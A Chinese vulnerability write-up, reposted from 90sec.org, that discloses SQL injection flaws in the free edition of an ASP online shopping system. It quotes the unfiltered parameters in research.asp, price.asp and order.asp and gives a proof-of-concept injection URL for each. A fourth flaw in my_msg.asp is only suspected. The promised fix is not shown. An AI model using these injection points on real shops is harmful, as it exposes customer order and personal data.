版本:网趣网上购物系统旗舰版(免费版)
下载:?id=6
----------------------------------------------------------------------
第一处:
/research.asp
对selectname未进行任何过滤,涛涛电脑知识网,造成搜索型注入
code:
7-12行
dim action,searchkey,anclassid,jiage,selectname
anclassid=request("anclassid")
searchkey=request("searchkey")
jiage=request("jiage")
action=request("action")
selectname=request("selectname") //获取selectname,中间无任何过滤212-230行
if anclassid<>0 then
select case action
case "1"
sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and
anclassid="&anclassid&" "
case "2"
sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and
anclassid="&anclassid&" "
case "3"
sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") and
anclassid="&anclassid&" "
end select
else
select case action
case "1"
sql1=" bookname like '%"&searchkey&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
case "2"
sql1=" pingpai like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") " //我利用的是此处
case "3"
sql1=" bookcontent like '%"&selectname&"%' and (shichangjia<"&jiage&" or huiyuanjia<"&jiage&" or vipjia<"&jiage&") "
end select
end if234行
rs.open "select * from products where "&sql1&" and zhuangtai=0 order by adddate desc",conn,1,1构造:
/research.asp?anclassid=0&action=2&jiage=100000&selectname=京润%' and 1=1 and '%'='
--------------------------------------------------------------------
第二处:
/price.asp
对anid未进行任何过滤,造成数字型注入
code:
74行:
anid=trim(request("anid")) //获取anid,中间无任何过滤104行:
if anid<>"" then
rs.open "select * from products where anclassid="&anid&" order by adddate desc",conn,1,1构造:
:8080/price.asp?anid=62 and 1=1
---------------------------------------------------------------------
第三处:
/order.asp
对dan未进行任何过滤,造成字符型注入
code:
64行:
dingdan=request.QueryString("dan") //获取dan,中间无任何过滤66行:
rs.open "select
products.bookid,products.shjiaid,products.bookname,products.shichangjia,products.huiyuanjia,orders.actiondate,orders.shousex,
orders.danjia,orders.feiyong,orders.fapiao,orders.userzhenshiname,orders.shouhuoname,orders.dingdan,orders.youbian,orders.liu
yan,orders.zhifufangshi,orders.songhuofangshi,orders.zhuangtai,orders.zonger,orders.useremail,orders.usertel,orders.shouhuodi
zhi,orders.bookcount from products inner join orders on products.bookid=orders.bookid where
orders.username='"&request.cookies("Cnhww")("username")&"' and dingdan='"&dingdan&"' ",conn,1,1构造:
下笔订单先,涛涛电脑知识网,否者无法利用
:8080/order.asp?dan=201277143453' and '1'='1
----------------------------------------------------------------------
第四处:
/my_msg.asp
对delid未进行任何过滤(我用的免费版,无法测试,不过有很大可能存在该漏洞)
----------------------------------------------------------------------
转自:90sec.org
网趣网上购物系统旗舰版(免费版)SQL注入及修复
时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:
相关文章
- 没有相关文章
共有评论 0 条相关评论
发表我的评论
- 大名:
- 内容:
本类热门
- 05-19·记事狗2.5.0鸡肋注入漏洞
- 05-19·动易xss拿站小记
- 04-19·记一次有趣的提权
- 04-19·TNTHK小组内部版后门解析
- 05-19·新版百度空间存储型XSS
- 04-19·ecmall 2.3.0-0918-scgbk注入及修复
- 05-19·Z-Blog1.8绕过权限漏洞
- 05-19·ThinkPHP最新版3.0RC1存在XSS漏洞
- 04-19·Wordpree插件评论啦代码审计不严
- 04-19·绕过CDN查找真实IP的思路,一个新颖并另类的方法
本类推荐
- 05-19·IIS7.5畸形解析拿shell利用方法
- 05-19·从对一个安全产品的测试看产品架构安全
- 05-19·mysql被降权提权思路
- 05-19·记一次win2003垃圾提权
本类固顶
- 暂无信息
网站备案号:蒙ICP备15000590号-1